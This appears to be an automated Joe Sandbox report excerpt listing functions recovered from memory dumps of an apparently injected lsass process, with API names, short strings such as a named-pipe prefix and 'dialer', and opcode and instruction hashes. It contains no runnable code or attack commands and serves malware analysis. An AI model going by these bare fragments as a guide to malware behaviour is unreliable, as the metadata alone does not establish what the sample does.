                                                                          • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction Fuzzy Hash: 54415B32614B84C6E761CF22E44439A77B1F389BA8F248129DF8D07B68DF38C849CB41
                                                                          APIs
                                                                          • FlsGetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D087
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0A6
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0CE
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0DF
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0F0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID: 1%$Y%
                                                                          • API String ID: 3702945584-1395475152
                                                                          • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction ID: 5fd4451407afae9fb266b5747a94aa354b26cb0abe68d3eef0f402a98e977e8e
                                                                          • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction Fuzzy Hash: D1114C3068434441FA6AAB275A513E962516B5C7F0F785B24AE3D076FEDE78DC02C683
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID:
                                                                          • API String ID: 190073905-0
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: 65cc65eb12478eed7e59dbe5af20ea895e9a9811b6e8982f7201964f625eb0cd
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: F2819F30A9034187FB53AB6798413D92292AB8D7B4F744525AF0C477B6EB3ACC45C7C2
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                          • String ID: api-ms-
                                                                          • API String ID: 2559590344-2084034818
                                                                          • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                          • Instruction ID: 03dcf4635245ae701bcfc235362316d2ff68836874f11cf0347ec2092aff8e99
                                                                          • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                          • Instruction Fuzzy Hash: 9F319031292B40E1EF239B47A4007D56394B74CBB0F7985259E2E4B7A0EF7DC845C392
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                          • String ID: CONOUT$
                                                                          • API String ID: 3230265001-3130406586
                                                                          • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction ID: ad989254367ffea67bb77bf17bba7392694ea205673c5da45a75a0c92e4d569a
                                                                          • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction Fuzzy Hash: 82114932650B4086E7528B53A84439977A4B79CFF4F644224EF5E87BA5CF38C814C782
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                          • String ID: wr
                                                                          • API String ID: 1092925422-2678910430
                                                                          • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction ID: fd890a10e18ff91e2345af510b04503e6d001258bbebb589a967ba1f92d71b91
                                                                          • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction Fuzzy Hash: 81113936B45B8182FF159B23E4082A972A0FB8CBA5F640029DF9D077A4EF3DC905C745
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$Current$Context
                                                                          • String ID:
                                                                          • API String ID: 1666949209-0
                                                                          • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                          • Instruction ID: 4b8643210702c91202cb0783c5a391a2a26d50b369a2e2f855514301358eef3e
                                                                          • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                          • Instruction Fuzzy Hash: 98D19736248B8882DA719B0AE49439A77A0F78CB94F600516EF8D47BB5DF3CC941CB81
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID: dialer
                                                                          • API String ID: 756756679-3528709123
                                                                          • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction ID: a2d052cb6962f498e3cef9ed57c0a8daa6a62b61da821da8834fd8d960af75c0
                                                                          • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction Fuzzy Hash: D231B332741B5182EB26DF1BE5447A9A7A0FB4DBA4F2881209F4C47B75EF34C8A5C781
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 2506987500-0
                                                                          • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction ID: b1e378f208745640ce80b78c559ffaa0a20b0e3a8eff5e4311b7b060cf634d78
                                                                          • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction Fuzzy Hash: F3112E3028534081FA66AB635A553A962416B9C7F4F344B24EE3E476FADE78DC01D6C3
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                          • String ID:
                                                                          • API String ID: 517849248-0
                                                                          • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction ID: 9022e9ca5b0b5f71c7b82a84b25e46de0569a46428ab685b711a92cff19137a4
                                                                          • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction Fuzzy Hash: A5015731740B4082EB51DB53A848799A3A1F78CBD1FA84035DF4D43B65DE38C989C781
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                          • String ID:
                                                                          • API String ID: 449555515-0
                                                                          • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction ID: 301de5e6a3bc59086d6f9150b82df67b6d6c22bbab0207dc7c03168e1951e1a1
                                                                          • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction Fuzzy Hash: 01015774651B40C2EB269B23E81879973A0BB9DBA2F240428CF4D07774EF3CC908C782
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 2395640692-629598281
                                                                          • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                          • Instruction ID: bd338bf40550659d0ab490f789d63c081b601061abea68a920c6aca0165ba548
                                                                          • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                          • Instruction Fuzzy Hash: 8351A13265170086EB16CB16E848B9937A6F348BA8F318524DF1A477E8DB3DCC41C782
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CombinePath
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3422762182-91387939
                                                                          • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction ID: 0e89825c8f5d70b27a483a01b8d98a85527b4973c2a0efa788cb30948269fb2a
                                                                          • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction Fuzzy Hash: A6F05E30644B8082EB058B53B9041996261AB8CFE0F245020EF4E07B78DE38C849C782
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 4061214504-1276376045
                                                                          • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction ID: 0a5f03d881548423950f550b58b8fc74d35f60bbb561fa5f685fc2d061d5bb49
                                                                          • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction Fuzzy Hash: 7EF06D71655B0582EB128B26E8443A97320EB8CBB5F740219CF6E472F4CF3DC948D381
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                          • Instruction ID: 73fda85837acdd30ad006dc6ccb1667200e15de9212539d4e27f8f5c03466d3a
                                                                          • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                          • Instruction Fuzzy Hash: 2702FA32259B8486EB61DB56F49439AB7A1F7C8794F200415EB8E87BB8DF7CC844CB41
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                          • Instruction ID: 819f4eb226d638b22eb9453569fbd0dff2ed878ae5cb7d9cc285f1354ad887c7
                                                                          • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                          • Instruction Fuzzy Hash: 9B61C536559B44C6E7629B16F48439AB7A0F7887A4F600515EF8E47BB8DF7CC840CB82
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3602728179.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: 2e1910b8291bafd17102f3214c72d3e729590e13e78c3872cab4fc5f060f1e3e
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: 22115472614B5353FA56162AE4553EB31C36F5C37CF784628AFE6076F68A34E8436200
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: 28d524a13795f3523b3f1b4b207150eb2f338f5cab7179f9a4c1ef00b7941454
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: DC119132AD0B5011F667256AD4913E531446B6DBB8F390624AF7E176F68B34CC41C2A2
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3602728179.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                          • API String ID: 3215553584-4202648911
                                                                          • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction ID: 48ac8b7a938d00f4a24374fee49c64dd94bfb0dfea2bd827f35d3ab40a9a7452
                                                                          • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction Fuzzy Hash: 3961B43652234853FA6B8B67E5443EBBAA3EF8D748F744415CB46077B4DB34C967A200
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CallEncodePointerTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3544855599-2084237596
                                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction ID: 1c54ac8669fca167ed3fb4a5461af2b1e7039b1515757cf07daf6e620200d245
                                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction Fuzzy Hash: B6619F33640B848AEB11DF66D4403DD77A0F748BA8F244256EF4E17BA9DB38C995C781
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3602728179.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: 5e9ed10956360af88f8a3a4b9cf73a15bede84b98f5d365089c0e3503e132e06
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: B751E432120388CBEB658B6794443DA37A3FB58B84F244117DB4947BE5CB39E5A2E700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: 6cac39d5d8876cbc65fde025732dcd94be71c236f1742025846821184820e854
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: D951AF72180780CAEB768F17958439977A0F358BA8F244256DF9D47BE5CB38D890D782
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3602728179.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction ID: 595c9e32b9df4e514150441d0aa3e925450171a8e5ef433ea7709e32150aded9
                                                                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction Fuzzy Hash: E551E43272170487DB96CF16D404BEA3797FB48BA8F318424DB06437A8EBB4C952A704
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3602728179.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction ID: fdcdef5ba31d8dbb8912a9a905e6b67567b4155f9952f6a6302e3e1a43461dee
                                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction Fuzzy Hash: 4831CF3122174487E792DF13E844BDA37A7FB48B98F258414EF8A037A8CB38C952D704
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                          • String ID:
                                                                          • API String ID: 2718003287-0
                                                                          • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                          • Instruction ID: 4b0a4d86e2932106c0371b6ae4a27eadaf1a36e0bf94906de29ca74a04e3cc8d
                                                                          • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                          • Instruction Fuzzy Hash: 44D1D072B54B8089E712CFAAD5403EC3BB1F3587A8F244216CF5D97BA9DA34C946C381
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Free
                                                                          • String ID:
                                                                          • API String ID: 3168794593-0
                                                                          • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction ID: e0938be913c4546f92e354b3f490316f5aad01bc8c73eed3b2a93003b4ccae50
                                                                          • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction Fuzzy Hash: 4C015A32A40B90C6E706DF67E94828A77A1F78DFA1F244425EF4E4372ADE38C851C791
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleErrorLastMode
                                                                          • String ID:
                                                                          • API String ID: 953036326-0
                                                                          • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                          • Instruction ID: bfe30e0d5e1943aced18828ddcaefd42f41aed77c308e3009ff5d43c7c6b682c
                                                                          • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                          • Instruction Fuzzy Hash: A491AFB264075085F762DF6A94803ED3BA4F758BA8F744109DF4E67AA5DB34CC82C782
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                          • String ID:
                                                                          • API String ID: 2933794660-0
                                                                          • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction ID: a5c049cb69e96cfbb56616fdcd891d3e75a6c1cb872cb67dafead8936c6c1fcc
                                                                          • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction Fuzzy Hash: 28110632B50B018AEB008B61E8542A833A4F719768F540E21DF6D87BA4DF78C598D2C1
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3602728179.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CallTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3163161869-2084237596
                                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction ID: fd2f36d4469ca00d580b9035ee875e4ebab09abcf6c64778c8a765e7c8b01963
                                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction Fuzzy Hash: E9619F33610B888AEB21DF66D0403DE77B2FB48B89F244215EF4917BA8DB38D166D700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3081899298-91387939
                                                                          • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                          • Instruction ID: c9d078df74486e421dded553d044dc307dfc5948a87b49d5b9b062cc3c97baf6
                                                                          • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                          • Instruction Fuzzy Hash: EE51E03228438181E676DB2FA1583EAA791F3CD7A4F640165DF4D03BAADA39CD44C7C2
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID: U
                                                                          • API String ID: 442123175-4171548499
                                                                          • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction ID: 3e73605a521e4cce57338457d13aec77e0fda4a33a28f7c4ac6780cba42ba59d
                                                                          • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction Fuzzy Hash: 48417172615B8086DB219F6AE8443E977A1F7987A4F604025EF4D87BA4DB3CC941C781
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
